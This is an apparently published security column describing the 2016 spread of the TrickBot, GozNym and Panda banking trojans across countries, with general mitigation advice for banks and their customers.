Security Experts:

Some Ideas Never Die; the Trojan is Wheeled in Again

The ancient Greeks are credited with many inventions that continue today in some form – the water mill, odometer, alarm clock and cartography, to name a few. As a security professional what comes to mind instantly is the Trojan horse, devised to sneak Greek soldiers behind the walls of the city of Troy and win the war.

A few decades ago, the term resurfaced to describe a type of attack that cyber criminals have used and evolved over time to wreak havoc on financial institutions. Although ransomware and DDoS attacks have captured the attention of the security industry of late, a surge in trojan variants targeting banks across geographies is catching many by surprise.

Banking trojans steal credentials for bank accounts by sitting on a banking customer’s computer until they access the account. At which point they launch a web injection attack by launching a man-in-the-browser (MITB) attack which typically creates a phishing page that sends login details to the attacker’s command and control server. The malicious actors behind these attacks take time to learn the banking systems of specific geographies so as to avoid detection and maximize profits. They wring out cash as long as possible before moving on.

To help you assess your digital risk, here are three examples of trojans from 2016 that will likely continue to be active into 2017.

1. Since the discovery of the TrickBot trojan in September 2016, its operators have continued to develop the malware to target new locations and customers of new banks. In October, TrickBot targeted bank customers in Australia and Canada, but throughout the remainder of 2016 both the number of banks affected and the locations of these banks increased dramatically – spreading to the UK, Germany, Singapore and New Zealand, among others.

At this time, TrickBot primarily targets financial services customers in English-speaking countries. Given the number of targets and how quickly TrickBot is spreading across geographies it is likely that the cyber criminals behind these attacks have significant resources at their disposal, including funding, time, and capability. And that capability includes not only development resources but a network of accomplices that make these attacks profitable by doing the leg work to cash out compromised bank accounts. With what appear to be vast resources supporting the operation, it’s likely that TrickBot will continue to penetrate deeper into current target geographies and spread to other regions during the year.

2. GozNym is another banking trojan identified early in 2016. The GozNym attacks started in the U.S. and then shifted to Europe, including 17 banks in Poland and 1 in Portugal. Since the initial reporting on GozNym In April 2016, it was developed to incorporate the targeting of new financial institutions and new target geographies. Furthermore, the methods which it has used, specifically the redirection attacks, were likely indicative of a well-resourced group who developed and operated the trojan, given that fake bank pages would need to be developed for each targeted bank. This heavy investment in advanced capabilities and the rapid evolution of the attacks, demonstrates that the bad actors behind these schemes are sophisticated and will likely leverage their investments to target customers in other geographies.

3. A variant of the Zeus trojan, Panda, started by targeting banks in Europe and North America but in mid-2016 spread to Brazil in advance of the Olympic games. Likely in order to take advantage of an influx of visitors engaging in online activity, Panda expanded its scope of targets beyond banks to include online payment providers, prepaid card services, bitcoin exchange platforms and even airline loyalty programs.  Panda can inject malicious code into ongoing web sessions to trick users with social engineering, and grabs login credentials on the fly. Its operators make use of the Automatic Transfer System (ATS) that automate typical banking actions like transferring money. Panda has since been discovered targeting banks in the UK and Australia. It remains active and is expected to continue to target these and additional geographies in the coming year.

So how can financial institutions and their customers mitigate digital risk?

• Banks and operators of other online payment systems must remain alert and continue to monitor which geographies are being targeted. Even in regions that have been “safe” to date, it’s likely only a matter of time as these trojans are targeting different geographies in definable waves. In addition, organizations should ensure operating systems, email gateways, and malware detection solutions are up to date and hardened against such attacks.

• Individuals should be reminded not to click on unsolicited emails or attachments. Password training will also help provide advice on changing credentials frequently and not reusing corporate credentials for personal activity.

Banking trojans continue to evolve. Adopting increasingly complex techniques, they spread to new regions, incorporate new languages, and target other online payment platforms and services besides banks. If you haven’t had a trojan poised outside your walls, chances are you will. But by understanding your digital risk you can make sure you’re not welcoming it in. 

view counter
Alastair Paterson is CEO and Co-Founder of Digital Shadows. Alastair has worked for over a decade advising secure government and FTSE 100 clients on large-scale data analytics for risk and intelligence. Before founding Digital Shadows in 2011, Alastair was International Propositions Manager at BAE Systems Detica working with clients in the Gulf, Europe and Australasia. He holds a first class MEng in Computer Science from the University of Bristol.